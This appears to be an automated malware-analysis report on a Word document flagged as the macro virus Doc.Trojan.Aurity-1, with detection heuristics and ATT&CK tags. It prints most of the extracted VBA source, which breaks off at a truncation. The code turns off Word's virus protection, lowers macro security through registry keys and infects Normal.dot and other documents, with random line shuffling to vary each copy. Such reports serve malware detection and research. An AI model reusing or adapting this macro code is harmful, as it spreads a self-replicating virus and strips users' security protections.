MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro designed to disable macro security settings. It attempts to write to registry keys 'HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security' and 'HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Security' to lower security levels. This is a common technique for macro-based malware to facilitate the execution of further malicious code.
Heuristics 3
-
ClamAV: Doc.Trojan.Aurity-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Aurity-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5921 bytes |
SHA-256: c91ac8724ec52fd4db7ec83a256ff23a85898d656b80a294230e75f8ce859c68 |
|||
|
Detection
ClamAV:
Doc.Trojan.Aurity-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Authority > ÌÒÖÑÌÑÈÈÊÙÒØÆßàÍÞÉÍ
Private Sub Document_Open()
On Error Resume Next
With Options
.VirusProtection = False: .SaveNormalPrompt = False: .ConfirmConversions = False
End With
SoftwareKey = "HKEY_CURRENT_USER\Software\Microsoft\Office\"
SecurityKey = Application.Version & "\Word\Security"
OfficeKey = SoftwareKey & SecurityKey
For CLoop = 0 To 1
KeyArray = Array("Level", "AccessVBOM")
System.PrivateProfileString("", OfficeKey, KeyArray(CLoop)) = 1&
Next CLoop
Set DocTT = ActiveDocument.VBProject.VBComponents(1).CodeModule
Set DocNT = NormalTemplate.VBProject.VBComponents(1).CodeModule
TTMarker = Left(DocTT.Lines(1, 1), 13)
NTMarker = Left(DocNT.Lines(1, 1), 13)
Randomize
For RLoop = 1 To Int((30 * Rnd) + 1)
Randomize
If Int((2 * Rnd) + 1) = 1 Then
RCase = 199
Else
RCase = 197
End If
Randomize
R = R & Chr(Int((26 * Rnd) + RCase))
Next
If TTMarker <> "'Authority > " Then
Do
e = e + 1
NTLines = NTLines & DocNT.Lines(e, 1) & vbCrLf
Loop Until e = DocNT.CountOfLines
DocTT.DeleteLines 1, DocTT.CountOfLines
DocTT.InsertLines 1, Left(NTLines, Len(NTLines) - 2)
DocTT.ReplaceLine 1, "'Authority > " & R
DocTT.ReplaceLine 2, "Private Sub Document_Open()"
TTC = True
End If
If NTMarker <> "'Authority > " Then
Do
C = C + 1
TTLines = TTLines & DocTT.Lines(C, 1) & vbCrLf
Loop Until C = DocTT.CountOfLines
DocNT.DeleteLines 1, DocNT.CountOfLines
DocNT.InsertLines 1, Left(TTLines, Len(TTLines) - 2)
DocNT.ReplaceLine 1, "'Authority > " & R
DocNT.ReplaceLine 2, "Private Sub Document_Close()"
NTC = True
End If
If TTC = True Then
Randomize
If Int((2 * Rnd) + 1) = 1 Then
C1 = 29: C2 = 30: C3 = 31: C4 = 32: C5 = 33: C6 = 34
C7 = 35: C8 = 36: C9 = 37: C10 = 38: C11 = 39
K1 = 40: K2 = 41: K3 = 42: K4 = 43: K5 = 44: K6 = 45
K7 = 46: K8 = 47: K9 = 48: K10 = 49: K11 = 50
Else
C1 = 40: C2 = 41: C3 = 42: C4 = 43: C5 = 44: C6 = 45
C7 = 46: C8 = 47: C9 = 48: C10 = 49: C11 = 50
K1 = 29: K2 = 30: K3 = 31: K4 = 32: K5 = 33: K6 = 34
K7 = 35: K8 = 36: K9 = 37: K10 = 38: K11 = 39
End If
With DocTT
.ReplaceLine C1, "If TTMarker <> ""'Authority > "" Then"
.ReplaceLine C2, "Do"
.ReplaceLine C3, "e = e + 1"
.ReplaceLine C4, "NTLines = NTLines & DocNT.Lines(e, 1) & vbCrLf"
.ReplaceLine C5, "Loop Until e = DocNT.CountOfLines"
.ReplaceLine C6, "DocTT.DeleteLines 1, DocTT.CountOfLines"
.ReplaceLine C7, "DocTT.InsertLines 1, Left(NTLines, Len(NTLines) - 2)"
.ReplaceLine C8, "DocTT.ReplaceLine 1, ""'Authority > "" & R"
.ReplaceLine C9, "DocTT.ReplaceLine 2, ""Private Sub Document_Open()"""
.ReplaceLine C10, "TTC = True"
.ReplaceLine C11, "End If"
.ReplaceLine K1, "If NTMarker <> ""'Authority > "" Then"
.ReplaceLine K2, "Do"
.ReplaceLine K3, "c = c + 1"
.ReplaceLine K4, "TTLines = TTLines & DocTT.Lines(c, 1) & vbCrLf"
.ReplaceLine K5, "Loop Until c = DocTT.CountOfLines"
.ReplaceLine K6, "DocNT.DeleteLines 1, DocNT.CountOfLines"
.ReplaceLine K7, "DocNT.InsertLines 1, Left(TTLines, Len(TTLines) - 2)"
.ReplaceLine K8, "DocNT.ReplaceLine 1, ""'Authority > "" & R"
.ReplaceLine K9, "DocNT.ReplaceLine 2, ""Private Sub Document_Close()"""
.ReplaceLine K10, "NTC = True"
.ReplaceLine K11, "End If"
End With
E1 = "VirusProtection"
E2 = "SaveNormalPrompt"
E3 = "ConfirmConversions"
EF = " = False"
EN = ": ."
Randomize
Select Case Int((6 * Rnd) + 1)
Case 1: RL = Chr(46) & E1 & EF & EN & E2 & EF & EN & E3 & EF
Case 2: RL = Chr(46) & E1 & EF & EN & E3 & EF & EN & E2 & EF
Case 3: RL = Chr(46) & E2 & EF & EN & E1 & EF & EN & E3 & EF
Case 4: RL = Chr(46) & E2 & EF & EN & E3 & EF & EN & E1 & EF
Case 5: RL = Chr(46) & E3 & EF & EN & E1 & EF & EN & E2 & EF
Case 6: RL = Chr(46) & E3 & EF & EN & E2 & EF & EN & E1 & EF
End Select
DocTT.ReplaceLine 5, RL
RC1 = ".VBProject.VBComponents(1).CodeModule"
RC2 = "Set
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.